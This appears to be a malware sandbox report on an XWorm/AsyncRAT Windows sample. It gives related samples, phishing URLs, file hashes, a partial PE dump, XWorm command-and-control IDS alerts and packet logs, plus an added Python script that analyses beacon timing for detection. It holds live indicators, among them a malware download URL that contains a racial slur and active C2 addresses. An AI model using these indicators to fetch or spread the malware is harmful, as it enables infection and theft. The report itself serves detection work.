AMAZON-02US | na.elf | malicious | Gafgyt, Mirai, Okiru | 34.249.145.219
SALSGIVERUS | PixpFUv4G7.exe | malicious | Quasar, XWorm | 147.185.221.21
SALSGIVERUS | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 147.185.221.23
SALSGIVERUS | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 147.185.221.23
SALSGIVERUS | Bpz46JayQ4.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | e4L9TXRBhB.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | H1N45BQJ8x.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | r4RF3TX5Mi.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | BootstrapperV1.19.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | ra66DSpa.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | tMREqVW0.exe | malicious | XWorm | 147.185.221.19

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Camtech_Korea_Invoice_2024.html | malicious | HTMLPhisher | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | e4L9TXRBhB.exe | malicious | XWorm | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | CI7IM149dR.exe | malicious | XWorm | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | YirR3DbZQp.exe | malicious | XWorm | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | qtYuyATh0U.exe | malicious | XWorm | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | http://www.ngdhqw.blogspot.de/ | malicious | GRQ Scam | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | http://milumuduli.github.io/netflix-template | malicious | HTMLPhisher | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | http://hasnat22.github.io/Netflix-Clone | malicious | HTMLPhisher | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | http://hassan6077224.github.io/netflixclonetechtitans | malicious | HTMLPhisher | 18.224.107.108
3b5074b1b5d032e5620f69f9f700ff0e | http://shreyascyber.github.io/Netflix-Clone | malicious | HTMLPhisher | 18.224.107.108

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\rapent.exe | http://ser0xen.com/sucklemydicknigger.exe | malicious | XWorm |
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:@...e...........................................................
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29
                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                          MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                          SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                          SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                          SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                          Malicious:false
                                          Preview:....### explorer ###..[WIN]r
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 01:50:54 2024, mtime=Mon Oct 7 01:50:54 2024, atime=Mon Oct 7 01:50:54 2024, length=39424, window=hide
                                          Category:dropped
                                          Size (bytes):759
                                          Entropy (8bit):5.012031015916383
                                          Encrypted:false
                                          SSDEEP:12:8vqJq2g4N0MWC3lDdY//pa4jLxsfKtVojAfrHUVZJ8zBmV:8vqJqqS3ud+xa43RtqAfAV4zBm
                                          MD5:AEFDC4615BAA47BB7B0A28D255609792
                                          SHA1:1114229152BF13F4481B0D4B5F67607639374428
                                          SHA-256:3C4D81459389DECC5513245BFCBC0E10D7D9ABB94D9BBBCF81F5F867AD5F84FF
                                          SHA-512:4D67076DE21409DD579938710A662EC0F3395C1C3EC4058FD68E7DF2AF9B772E920BD96FE27CB9D044F52D6BC59BC5A395CBF8A8F37732CB734BAEC45C03B10C
                                          Malicious:false
                                          Preview:L..................F.... ...{...c...{...c...{...c...........................t.:..DG..Yr?.D..U..k0.&...&......vk.v....$.Y.c.....$.c.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^GY<............................%..A.p.p.D.a.t.a...B.V.1.....GY:...Roaming.@......CW.^GY:............................~..R.o.a.m.i.n.g.....`.2.....GY\. .rapent.exe..F......GY\.GY\.....*......................c!.r.a.p.e.n.t...e.x.e.......X...............-.......W....................C:\Users\user\AppData\Roaming\rapent.exe........\.....\.....\.....\.....\.r.a.p.e.n.t...e.x.e.`.......X.......992547...........hT..CrF.f4... .~.T..b...,.......hT..CrF.f4... .~.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39424
                                          Entropy (8bit):5.602390271817693
                                          Encrypted:false
                                          SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                                          MD5:49AA60A3EE7D3B03D16AA591024CBBC7
                                          SHA1:AB7A4B389A7583370A53792852A819AA34D5D2E8
                                          SHA-256:E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
                                          SHA-512:5DFCA79A35FE60F0CBE141A87EA1FED9AAB1D8726D771E69302733BE0F9E7FAACAFC31CB3F4545A8D2AF971A7E97D8A96D92D1C29CBC0FA8DE4D0BC499674448
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\rapent.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\rapent.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 89%
                                           • Antivirus: Virustotal, Detection: 76%
                                           Joe Sandbox View:
                                           • Filename: , Detection: malicious
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..8V............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.602390271817693
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:1c8DbXc5r0.exe
                                          File size:39'424 bytes
                                          MD5:49aa60a3ee7d3b03d16aa591024cbbc7
                                          SHA1:ab7a4b389a7583370a53792852a819aa34d5d2e8
                                          SHA256:e9f7edcb41000f0375515a01dae7d155723b8bbba28c7bae75c63e7d98fdedaa
                                          SHA512:5dfca79a35fe60f0cbe141a87ea1fed9aab1d8726d771e69302733be0f9e7faacafc31cb3f4545a8d2af971a7e97d8a96d92d1c29cbc0fa8de4d0bc499674448
                                          SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                                          TLSH:38035C447BD08216D5EE6FFA69B3B5060730F6038A13D79E4CD889675B37B848A413EB
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x40af9e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66F9D0FF [Sun Sep 29 22:13:19 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                           (the rest of the entry-point dump is 00 00 padding, which the disassembler renders as add byte ptr [eax], al)
                                           Name                                  Virtual Address  Virtual Size  Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_IMPORT          0xaf50           0x4b          .text
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc000           0x4f8         .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe000           0xc           .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                           IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                           Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                           .text   0x2000           0x8fa4        0x9000    944391760fd16f81edc4808073539b68  False     0.4962565104166667  data       5.726552571385622    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .rsrc   0xc000           0x4f8         0x600     06d622f0afad8dd4db2a7a59f19557e9  False     0.376953125         data       3.759813864057344    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc  0xe000           0xc           0x200     56add030f8e08e0b0319969a5ad7a879  False     0.044921875         data       0.07763316234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                           Name         RVA     Size   Type                                                                               Language  Country  ZLIB Complexity
                                           RT_VERSION   0xc0a0  0x264  data                                                                                                   0.45588235294117646
                                           RT_MANIFEST  0xc308  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                       0.5469387755102041
                                           DLL          Import
                                           mscoree.dll  _CorExeMain
                                           Timestamp                        SID      Signature                                                              Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
                                           2024-10-07T04:51:08.553146+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:08.553146+0200  2852874  ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2                  1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:08.980911+0200  2855924  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound               1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:51:09.270583+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:09.272872+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:51:21.674385+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:21.676737+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:51:34.080889+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:34.085484+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:51:38.569939+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:38.569939+0200  2852874  ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2                  1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:47.469232+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:47.470728+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:51:58.893126+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:51:58.895796+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:52:08.174794+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:52:08.175608+0200  2852923  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)  1         192.168.2.4     49738        147.185.221.18  55624      TCP
                                           2024-10-07T04:52:08.576283+0200  2852870  ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes           1         147.185.221.18  55624        192.168.2.4     49738      TCP
                                           2024-10-07T04:52:08.576283+0200  2852874  ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2                  1         147.185.221.18  55624        192.168.2.4     49738      TCP
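Added example (not part of the Joe Sandbox report): the beacon analysis a detection engineer runs over the alert table above before writing a network hunt. ALERT_ROWS is constructed from the 19 rows of that table (timestamp, SID, source and destination endpoint; signature names copied verbatim); nothing else is pulled from the network. The code groups alerts per SID and flow, measures the inter-arrival jitter to separate a timer-driven keep-alive from ad-hoc check-ins, and extracts the non-private endpoint as the C2 IOC. The 5% relative-jitter threshold and the three-hit minimum are my choices, not values from the report or from any Suricata rule.

```python
import ipaddress
import statistics
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

SIGNATURES = {  # copied from the alert table
    2852870: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes",
    2852874: "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2",
    2852923: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)",
    2855924: "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound",
}
C2, BOT = ("147.185.221.18", 55624), ("192.168.2.4", 49738)

# (timestamp, sid, source endpoint, destination endpoint): constructed from the table above.
ALERT_ROWS = [
    ("2024-10-07T04:51:08.553146+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:08.553146+0200", 2852874, C2, BOT),
    ("2024-10-07T04:51:08.980911+0200", 2855924, BOT, C2),
    ("2024-10-07T04:51:09.270583+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:09.272872+0200", 2852923, BOT, C2),
    ("2024-10-07T04:51:21.674385+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:21.676737+0200", 2852923, BOT, C2),
    ("2024-10-07T04:51:34.080889+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:34.085484+0200", 2852923, BOT, C2),
    ("2024-10-07T04:51:38.569939+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:38.569939+0200", 2852874, C2, BOT),
    ("2024-10-07T04:51:47.469232+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:47.470728+0200", 2852923, BOT, C2),
    ("2024-10-07T04:51:58.893126+0200", 2852870, C2, BOT),
    ("2024-10-07T04:51:58.895796+0200", 2852923, BOT, C2),
    ("2024-10-07T04:52:08.174794+0200", 2852870, C2, BOT),
    ("2024-10-07T04:52:08.175608+0200", 2852923, BOT, C2),
    ("2024-10-07T04:52:08.576283+0200", 2852870, C2, BOT),
    ("2024-10-07T04:52:08.576283+0200", 2852874, C2, BOT),
]
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    src: tuple
    dst: tuple


@dataclass
class BeaconStats:
    sid: int
    flow: frozenset
    hits: int
    mean_gap: float   # seconds between consecutive alerts of this SID on this flow
    jitter: float     # population std-dev of those gaps

    @property
    def relative_jitter(self):
        return self.jitter / self.mean_gap if self.mean_gap else float("inf")


def parse_alerts(rows=ALERT_ROWS):
    return [Alert(datetime.strptime(ts, TS_FORMAT), sid, src, dst) for ts, sid, src, dst in rows]


def beacon_stats(alerts, min_hits=3):
    """Inter-arrival statistics per (SID, flow); the flow key ignores direction."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a.sid, frozenset((a.src, a.dst)))].append(a.ts)
    stats = []
    for (sid, flow), times in groups.items():
        if len(times) < min_hits:
            continue  # too few hits to judge periodicity
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        stats.append(BeaconStats(sid, flow, len(times), statistics.fmean(gaps), statistics.pstdev(gaps)))
    return stats


def periodic_sids(stats, max_relative_jitter=0.05):
    """SIDs whose alerts arrive on a fixed timer rather than on demand."""
    return {s.sid for s in stats if s.relative_jitter <= max_relative_jitter}


def c2_endpoints(alerts):
    """Every non-private (ip, port) in any alert: the IOCs to block and hunt for."""
    return {ep for a in alerts for ep in (a.src, a.dst) if not ipaddress.ip_address(ep[0]).is_private}


if __name__ == "__main__":
    alerts = parse_alerts()
    stats = beacon_stats(alerts)
    for s in sorted(stats, key=lambda s: s.sid):
        print(f"{s.sid} {SIGNATURES[s.sid]}: {s.hits} hits, mean gap {s.mean_gap:.2f}s, jitter {s.jitter:.3f}s")
    print("timer-driven SIDs:", periodic_sids(stats))
    print("C2 endpoints:", c2_endpoints(alerts))
```

On this data only SID 2852874 (the inbound PING) comes out as timer-driven: its three hits are 30.017 s and 30.006 s apart, a server-side keep-alive with millisecond jitter, whereas the check-in signatures fire at irregular 0.4 s to 12.4 s gaps because they track command traffic. A 30-second cadence on a non-standard port to a single external host is the shape to encode in a NetFlow or Zeek conn-log hunt once the IDS signature itself is gone.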
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 7, 2024 04:50:55.469443083 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:55.469532967 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:55.469630957 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:55.511298895 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:55.511362076 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.033669949 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.033821106 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.036633015 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.036686897 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.037117004 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.086931944 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.101994038 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.143414021 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.219357014 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.219770908 CEST | 443 | 49737 | 18.224.107.108 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.219973087 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.230228901 CEST | 49737 | 443 | 192.168.2.4 | 18.224.107.108
                                          Oct 7, 2024 04:50:56.412034035 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:50:56.416903973 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.417023897 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:50:56.581916094 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:50:56.586949110 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:08.553145885 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:08.594361067 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:08.980911016 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:08.986190081 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:09.270582914 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:09.272871971 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:09.278851986 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:21.384712934 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
